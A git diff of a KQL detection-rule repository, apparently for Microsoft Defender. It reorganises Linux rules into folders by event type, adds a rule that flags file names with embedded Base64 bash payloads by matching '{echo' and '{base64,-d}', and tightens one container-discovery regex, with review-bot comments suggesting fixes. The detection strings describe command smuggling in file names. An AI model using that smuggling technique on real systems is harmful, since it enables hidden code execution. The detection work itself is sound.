diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
rename to KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/linux/file_event/persistence_via_cron_files.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/persistence_via_cron_files.kql
rename to KQL/rules/linux/file_event/persistence_via_cron_files.kql
diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql
rename to KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
rename to KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
diff --git a/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
new file mode 100644
index 00000000..dcacdacf
--- /dev/null
+++ b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Filename with Embedded Base64 Commands
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: high
+// Description: Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
+// These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate files with similar naming patterns (very unlikely).
+
+DeviceFileEvents
+| where FolderPath contains "{echo" or FolderPath contains "{base64,-d}"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql
rename to KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
rename to KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
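Review bot: The new `where` clause keys only on `FolderPath`, yet the rule is about crafted file names; whether `FolderPath` in `DeviceFileEvents` carries the leaf name or only the parent directory depends on the schema the tenant exposes, so the check is safer if it also covers `FileName`: `| where FolderPath contains "{echo" or FileName contains "{echo" or FolderPath contains "{base64,-d}" or FileName contains "{base64,-d}"`. The header lists `attack.defense-evasion` in Tags while the `MITRE Tactic` line names only Execution; either add Defense Evasion there or drop the tag so the two fields agree. A one-line comment above the query noting that KQL `contains` is case-insensitive, so upper-case variants of the brace-expansion strings are already matched, would spare the next reader a trip to the docs.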
diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
similarity index 100%
rename from KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
rename to KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
similarity index 100%
rename from KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
rename to KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
similarity index 100%
rename from KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
rename to KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
similarity index 100%
rename from KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
rename to KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
similarity index 100%
rename from KQL/rules/Execution/linux_reverse_shell_indicator.kql
rename to KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
similarity index 100%
rename from KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
rename to KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql
rename to KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
rename to KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/linux/process_creation/bash_interactive_shell.kql
similarity index 100%
rename from KQL/rules/Execution/bash_interactive_shell.kql
rename to KQL/rules/linux/process_creation/bash_interactive_shell.kql
diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
similarity index 100%
rename from KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
rename to KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/capabilities_discovery_linux.kql
rename to KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
similarity index 100%
rename from KQL/rules/Execution/capsh_shell_invocation_linux.kql
rename to KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
rename to KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/linux/process_creation/clear_linux_logs.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/clear_linux_logs.kql
rename to KQL/rules/linux/process_creation/clear_linux_logs.kql
diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
similarity index 100%
rename from KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
rename to KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/linux/process_creation/connection_proxy.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/connection_proxy.kql
rename to KQL/rules/linux/process_creation/connection_proxy.kql
diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
similarity index 100%
rename from KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
rename to KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
similarity index 100%
rename from KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
rename to KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/linux/process_creation/crontab_enumeration.kql
similarity index 100%
rename from KQL/rules/Discovery/crontab_enumeration.kql
rename to KQL/rules/linux/process_creation/crontab_enumeration.kql
diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql
similarity index 100%
rename from KQL/rules/Command and Control/curl_usage_on_linux.kql
rename to KQL/rules/linux/process_creation/curl_usage_on_linux.kql
diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/linux/process_creation/dd_file_overwrite.kql
similarity index 100%
rename from KQL/rules/Impact/dd_file_overwrite.kql
rename to KQL/rules/linux/process_creation/dd_file_overwrite.kql
diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
rename to KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/linux/process_creation/disable_or_stop_services.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_or_stop_services.kql
rename to KQL/rules/linux/process_creation/disable_or_stop_services.kql
diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/linux/process_creation/disabling_security_tools.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disabling_security_tools.kql
rename to KQL/rules/linux/process_creation/disabling_security_tools.kql
diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
similarity index 100%
rename from KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
rename to KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
similarity index 100%
rename from KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
rename to KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
similarity index 100%
rename from KQL/rules/Execution/enable_bpf_kprobes_tracing.kql
rename to KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
similarity index 100%
rename from KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql
rename to KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
similarity index 100%
rename from KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql
rename to KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/file_and_directory_discovery_linux.kql
rename to KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/linux/process_creation/file_deletion.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_deletion.kql
rename to KQL/rules/linux/process_creation/file_deletion.kql
diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql
rename to KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
similarity index 100%
rename from KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
rename to KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/linux/process_creation/history_file_deletion.kql
similarity index 100%
rename from KQL/rules/Impact/history_file_deletion.kql
rename to KQL/rules/linux/process_creation/history_file_deletion.kql
diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
similarity index 100%
rename from KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
rename to KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/linux/process_creation/install_root_certificate.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/install_root_certificate.kql
rename to KQL/rules/linux/process_creation/install_root_certificate.kql
diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
similarity index 100%
rename from KQL/rules/Execution/interactive_bash_suspicious_children.kql
rename to KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
similarity index 100%
rename from KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
rename to KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
rename to KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
rename to KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
similarity index 100%
rename from KQL/rules/Impact/linux_crypto_mining_indicators.kql
rename to KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
rename to KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql
similarity index 100%
rename from KQL/rules/Execution/linux_hacktool_execution.kql
rename to KQL/rules/linux/process_creation/linux_hacktool_execution.kql
diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql
rename to KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/linux/process_creation/linux_package_uninstall.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_package_uninstall.kql
rename to KQL/rules/linux/process_creation/linux_package_uninstall.kql
diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/linux/process_creation/linux_recon_indicators.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/linux_recon_indicators.kql
rename to KQL/rules/linux/process_creation/linux_recon_indicators.kql
diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
similarity index 100%
rename from KQL/rules/Discovery/linux_remote_system_discovery.kql
rename to KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
rename to KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
rename to KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql
similarity index 100%
rename from KQL/rules/Persistence/linux_webshell_indicators.kql
rename to KQL/rules/linux/process_creation/linux_webshell_indicators.kql
diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/local_groups_discovery_linux.kql
rename to KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
rename to KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
similarity index 100%
rename from KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
rename to KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
similarity index 100%
rename from KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
rename to KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
similarity index 100%
rename from KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
rename to KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/linux/process_creation/nohup_execution.kql
similarity index 100%
rename from KQL/rules/Execution/nohup_execution.kql
rename to KQL/rules/linux/process_creation/nohup_execution.kql
diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
similarity index 100%
rename from KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
rename to KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
similarity index 100%
rename from KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
rename to KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
similarity index 68%
rename from KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
rename to KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
index 108b5468..8b394baf 100644
--- a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
+++ b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
@@ -10,4 +10,4 @@
 // - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
 DeviceProcessEvents
-| where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls"
\ No newline at end of file
+| where (ProcessCommandLine endswith " /" or ProcessCommandLine contains " / ") and FolderPath endswith "/ls" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
rename to KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
similarity index 100%
rename from KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
rename to KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
rename to KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
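Review bot: The long-option alternatives in both regexes on the added `| where` line require whitespace after the option (`\\s--directory\\s`, `\\s--inode\\s`), so a command line that ends with the long option, e.g. `ls / --inode`, is not matched even though the new `contains " / "` clause explicitly allows the path to come before the options. Ending each alternative with `(?:\\s|$)` closes that gap: `ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}d|\\s--directory(?:\\s|$))"` and `ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}i|\\s--inode(?:\\s|$))"`. Since both patterns are regular (non-verbatim) string literals, every backslash has to be doubled; a verbatim literal such as `@"(?:\s-[^-\s]{0,20}d|\s--directory(?:\s|$))"` would express the same pattern with less room for escaping mistakes. The hunk header counts four old and four new lines but only three are visible here, which suggests a blank context line was lost in rendering; the rule's header comments on lines 1-9 are outside the hunk.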
diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql
rename to KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
similarity index 100%
rename from KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
rename to KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
similarity index 100%
rename from KQL/rules/Execution/potential_perl_reverse_shell_execution.kql
rename to KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
similarity index 100%
rename from KQL/rules/Execution/potential_php_reverse_shell.kql
rename to KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
similarity index 100%
rename from KQL/rules/Execution/potential_ruby_reverse_shell.kql
rename to KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
similarity index 100%
rename from KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
rename to KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
similarity index 100%
rename from KQL/rules/Execution/potential_xterm_reverse_shell.kql
rename to KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
rename to KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
similarity index 100%
rename from KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql
rename to KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/linux/process_creation/print_history_file_contents.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/print_history_file_contents.kql
rename to KQL/rules/linux/process_creation/print_history_file_contents.kql
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
rename to KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
similarity index 100%
rename from KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
rename to KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
